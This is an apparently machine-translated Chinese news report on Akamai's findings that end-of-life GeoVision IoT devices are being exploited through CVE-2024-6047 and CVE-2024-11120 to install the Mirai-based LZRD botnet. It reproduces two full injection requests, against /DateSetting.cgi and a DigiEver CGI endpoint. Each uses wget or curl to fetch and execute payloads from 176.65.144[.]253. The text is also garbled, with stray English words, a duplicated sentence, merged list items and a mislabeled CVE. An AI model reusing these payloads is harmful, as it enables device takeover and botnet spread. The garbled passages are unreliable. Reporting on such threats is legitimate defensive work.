Akamai 安全智能和响应团队 (SIRT) 已确定在已停产的 GeoVision 物联网设备中主动利用两个命令注入漏洞 — — CVE-2024-6047 和 CVE-2024-11120。根据Akamai的说法,这标志着“自2024年6月和2024年11月首次披露以来首次报告对这些漏洞的积极利用。

attackers攻击者针对易受攻击的 GeoVision 设备中的 /DateSetting.cgi 端点,通过 szSrvIpAddr 参数注入恶意命令。attackers这些漏洞使未经身份验证的远程攻击者能够执行任意系统命令。

Akamai 解释说:“某些已停产的 GeoVision 设备无法正确过滤此参数的用户输入,这允许未经身份验证的远程攻击者在目标系统上注入和执行任意系统命令。一旦被利用,这些设备将被迫下载并运行一个名为LZRD的基于Mirai的恶意软件变体,该变体来自恶意URL:

/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.windows.com;$(cd /tmp;wget http://176.65.144[.]253/hiddenbin/boatnet.arm7;chmod 777 boatnet.arm7;./boatnet.arm7 geovision;)&NTP_Update_time_hh=5&NTP_Update_time_mm=10&szDateM=2024/08/07&szTimeM=14:25:16&bDateFomat=0&bDateFormatMisc=0&dwIsDelay=1&Montype=0&submit=Apply

有效载荷执行字符串是为基于ARM的设备量身定制的,并通过精心制作的HTTP POST请求注入。

执行后,恶意软件会向受害者机器打印一个唯一的控制台字符串——LZRD变体的名片。Akamai 研究人员还观察了一系列与Mirai血统一致的攻击功能,包括:

Akamai 研究人员还观察了一系列与Mirai血统一致的攻击功能,包括:

sym.attack_method_tcpsym.attack_udp_plain 攻击sym.attack_method_ovhsym.attack_method_stdhex

此外,分析师在恶意软件的 sym.resolve_cnc_addr() 函数中发现了一个硬编码的命令和控制(C2) IP 地址。这种基础设施包括与过去竞选活动中看到的非常相似的横幅,特别是InfectedSlurs僵尸网络。

LZRD驱动的僵尸网络不会停在GeoVision设备上。Akamai 的蜜罐记录了利用其他几个已知漏洞的尝试vulnerabilities,包括:

Hadoop YARN漏洞CVE-2018-10561(ZTE ZXV10 H108L路由器)Akamai 之前报告的 DigiEver IoT 漏洞

其中一个有效载荷试图从以下情况获取并运行脚本:

/cgi-bin/cgi_main.cgi

  cgiName=time_tzsetup.cgi&page=/cfg_system_time.htm&id=69&ntp=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&ntp1=time.stdtime.gov.tw&ntp2=`curl --output wget.sh http://176.65.144[.]253/digi.sh; chmod 777 *; ./wget.sh`&isEnabled=0&timeDiff=+9&ntpAutoSync=1&ntpSyncMode=1&day=0&hour=0&min=0&syncDiff=30

为了帮助维护者,Akamai 在其完整报告中纳入了妥协指标 (IOC),并敦促组织:

退出或隔离过时的物联网设备。监控网络流量,以获取与已知 C2 IP 的异常连接。阻止已知的恶意端点,包括 hiddenbin/boatnet.arm7 和关联域。